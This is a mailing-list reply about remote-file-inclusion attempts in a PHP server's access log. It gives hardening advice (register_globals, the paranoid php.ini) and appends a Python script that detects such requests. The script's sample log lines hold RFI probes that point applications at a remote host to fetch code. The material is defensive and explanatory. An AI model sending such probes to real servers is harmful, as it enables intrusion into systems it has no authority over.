On Mon, Nov 06, 2006 at 11:19:20AM +0100, Heilig Szabolcs wrote:
> Hello!
>
> >http://jesusch.de/~jesusch/tmp/access.log
>
> There are many log entries with "something=http://" style
> pattern. These are common attack methods against default configured
> servers with poorly written applications. Many of these rely on
> register_globals=on php.ini setting. Turn it off first globally.
> This may break some old PHP apps, but you can turn it back on
> in virtualhosts locally.

PHP users might want to browse the paranoid ini configuration for PHP
available at /usr/share/doc/php5-common/examples/php.ini-paranoid

The comments in that configuration file might be enlightening. It might also
be a good exercise to do this:

$ diff -u /usr/share/doc/php5-common/examples/php.ini-dist \
  /usr/share/doc/php5-common/examples/php.ini-paranoid |less

(Notice that the paranoid configuration file might not be fully up-to-date
with the latest variables available so the diff will catch both the changes
to the default variable values as well as the variables that are missing in
the paranoid configuration file.)

Regards

Javier
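The "something=http://" entries mentioned in the quoted message can be listed from an Apache access log with a short script. This is an added example, not part of the original thread: the log lines are constructed (documentation addresses only), the function names are illustrative, and a hit is a request to triage, not proof of compromise.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a remote URL.
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(target):
    """Return (name, value) pairs whose percent-decoded value is a remote URL."""
    query = urlsplit(target).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME.match(value.strip())]

def scan(lines):
    """Yield one record per suspicious parameter. Only the request target is
    inspected, so an http:// Referer on a normal request is not flagged."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        for name, value in remote_url_params(m['target']):
            hits.append({'line': lineno, 'ip': m['ip'], 'param': name,
                         'value': value, 'status': int(m['status'])})
    return hits

def summarize(hits):
    """Count hits per (client, parameter) to show which variables are probed."""
    return Counter((h['ip'], h['param']) for h in hits)

# Constructed sample input, not taken from the access.log linked in the thread.
SAMPLE = [
    '198.51.100.7 - - [06/Nov/2006:03:12:01 +0100] "GET /index.php?page=http://192.0.2.10/x.txt? HTTP/1.0" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [06/Nov/2006:03:12:02 +0100] "GET /gallery/init.php?inc=http%3A%2F%2F192.0.2.10%2Fx.txt HTTP/1.0" 404 210 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [06/Nov/2006:09:00:00 +0100] "GET /search.php?q=php+tutorial HTTP/1.1" 200 4096 "http://example.com/start" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(hit)
    print(summarize(scan(SAMPLE)))
```

Hits that returned status 200 deserve attention first, since the application accepted the request rather than rejecting it.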